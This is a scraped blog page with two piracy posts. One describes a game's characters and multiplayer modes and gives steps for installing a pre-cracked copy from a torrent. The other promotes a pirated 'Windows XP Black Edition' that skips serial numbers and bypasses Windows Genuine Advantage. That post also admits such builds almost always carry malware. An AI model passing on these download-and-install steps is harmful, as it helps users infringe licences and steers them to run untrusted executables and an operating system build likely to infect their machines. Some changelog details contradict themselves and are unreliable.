The player can choose among 6 characters to be their in-game avatar. The characters are: Jacob Norris the welder, Barbara Johnson the housewife, Danny Wilkins the football star, Buck Raleigh the businessman, Naledi Atkins the pilot, and Suresh Sheti the Indian mystic. Two additional characters were available as a pre-order bonus from 12game, GameStop, EB Games [H] or Game, or through the purchase of a DLC pack: a fisherman named Zigo d'Acosta and an actress named Mlle Blanche de Glace. Another two characters were made available by downloading the Sinclair Solutions Tester Pack: a criminal named Louie McGraff and a smooth-talking playboy named Oscar Calraca.

Multiplayer comes in 7 different modes, two of which have a single and team based mode. The modes are:Survival of the Fittest A 'free-for-all' mode where each player gets points for killing each of the other players. Whichever player has the most kills or 20 kills at the end of the match wins.Civil War Similar to 'Survival of the Fittest,' but in this mode players are divided into two teams and the team with the most collective kills at the end of the match wins.Last Splicer Standing A variation of 'Civil War' in which players do not respawn after being killed. Each match [H1] consists of several rounds in which players attempt to outlive the players on the enemy team.Capture the Sister A 'Capture the Flag' style mode where players are divided into two teams. One team has to protect a Little Sister while the other team tries to steal her and place her in a vent on the other side of the map. The team protecting the little sister will have a randomly chosen player to be a Big Daddy. After a pre-determined amount of time, the teams switch roles. Whichever team has the most captures at the end of the match wins.ADAM Grab In this mode there is one Little Sister on the map and the player must seek her out and maintain possession of her as long as possible. The first person to hold onto the Little Sister for 3 minutes wins.Team ADAM Grab A variant of 'ADAM Grab' where players are divided into two teams. The objective is the same, but victory is determined by a collective score rather than individual scores, and the first team to hold the little sister for 3 minutes wins.Turf War Players are split into two teams and each team must reach the pre-determined points on the map to capture that point. The team with the most control points over the longest time wins.

In the multiplayer modes 'Survival of the Fittest', 'Civil War', and 'Turf War', a Big Daddy suit will spawn at a random location in the level. The choice is given to the player who finds this suit to become the Big Daddy, which will give the player greater strength and endurance but prohibits the use of plasmids and hacking, as well as expelling any previously held damage bonuses against other players. The Big Daddy can stomp, shoot a rivet gun, melee attack, and throw proximity mines. All damage dealt to the Big Daddy is permanent, and cannot be replenished. Once the Big Daddy is defeated, the suit disappears, and spawns in another location on the map two minutes later. In 'Capture the Sister' one member of the defending team is chosen at random to be the Big Daddy. After the player's death, the Big Daddy suit disappears for the rest of the round.



ScreenShots:

















System Requirements:




  • OS: Windows XP SP3 
  • Processor: 2.4 GHz Dual Core Processor 
  • Memory: 2 GB ( XP ) / 2 GB ( Vista ) 
  • Video Memory: 256 MB 
  • Video Card: NVIDIA GeForce 8500 / ATI Radeon HD 2600 Sound: DirectX 9.0c Compatible Supported 
  • Video Cards: ATI RADEON X1950, HD 2000 / 3000 / 4000 / 5000 series NVIDIA GeForce 7 / 8 / 9 / 100 / 200 series 




Download Game:


Use Utorrent or BitTorrent to download torrent game.




How To Download And Install?


1) Download The game using torrent link,
2) Now Open Part1 .EXE File. Choose location and install it.
3) After it is done run game from desktop. [ALREADY CRACKED].
4) enjoy :p


Hope You Liked kindly rate comment and follow me. :)

Regards,
Zulqurnain jutt

Windows XP Pro SP3 32-bit - black edition Torrent download

0 Comments



A few years after Microsoft released its XP operating system, pirated "Black Editions" started popping up on bittorrent sites and other online forums. The nickname is derived from its black or very dark desktop theme and the fact that it's an illegal version of XP, usually XP Professional.



Features


There is no standard version of Windows XP Black. Not only is the OS pirated, but so is the software that's crammed with it. XP Black comes loaded with programs that would cost you thousands of dollars if you bought them properly. Depending on who puts the package together, you can get multiple versions of: browsers, CD/DVD burning software, business software--even security programs, which is ironic since it's almost impossible to find a Black Edition without malware.


Bypass WGA


Among the hacks in XP Black, it requires no serial number and it bypasses XP's Windows Genuine Advantage (WGA) security measures. WGA validates the Windows license online. If you have a pirated version of XP, and WGA is loaded on your computer, you will receive persistent messages indicating as much, as well as what you need to do to get a genuine copy. Some of the earlier versions of XP Black have since been caught by WGA, as Microsoft improved its security technology. Pirates have also adapted--later versions of XP Black do not, or may never, receive these messages.


patches[Fixed]

  •  MF4SBF Patch v2.0: Fixes the Windows XP slow boot bug which is caused by the "Microsoft .NET Framework NGEN v4.0.30319" Service. 
  •  TCP/IP Patch: Allows you to have 16777214 (Max) Half-Open TCP Connections instead of 10. 
  •  Uxtheme Patch: Allows you to use un-signed Custom visual styles.
  •  SFC Patch: Allows you to disable and enable Windows File Protection with a registry key. 
  •  RAID-5 Patch: This will enable Software RAID-5 Support. 


2012.12.20 Change log:



  •  Added Microsoft Visual C++ 2012 Runtime Libraries v11.0.51106.1.
  •  Replaced the "Keyfinder (Key Changer) v1.51.exe" with the "Windows XP Key Changer v1.0.vbs".
  •  Updated K-Lite Mega Codec Pack from "v9.5.0" to "v9.5.0".
  •  Updated Flash Player ActiveX Control from "v11.5.502.110" to "v11.5.502.135".
  •  Updated Java SE Runtime Environment (JRE) from "v7 Update 7" to "v9 Update 10".
  •  Updated Printer Update Pack and XPS Addon from "v1.2.1" to v1.2.2".
  •  Updated Windows XP Root Certificates Update (KB931125) from "Version April 2012" to "Version December 2012".
  •  Updated Tweak "Suppressing Microsoft Update nagging to install Windows Malicious Software Removal Tool (KB890830)" from "v4.15" to "v4.15".
  •  Includes all the new Windows XP Service Pack 3 Updates from 14.11.2012 till 11.12.2012.



Screen Shots:
















System Requirements:

  • 233 MHz of processor
  • 64 MB of RAM
  • 800 x 600 screen resolution
  • Up To 5 GB free hard drive space

Download From Torrent:




How To Download and install?


1) Download the torrent file using Utorrent and extract it with Winrar.

2) Now install it as dual boot Or   any other method you want .

3) To install this window independently burn all extracted files onto a CD and boot it on computer start up.

4)  Enjoy.

well i hadn't try it yet , but thinking to install windows 8 soon :p


Regards,
Zulqurnain jutt 
 

About Admin

I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on .


| Solve Byte © 2011 - 2016. All Rights Reserved | Back To Top |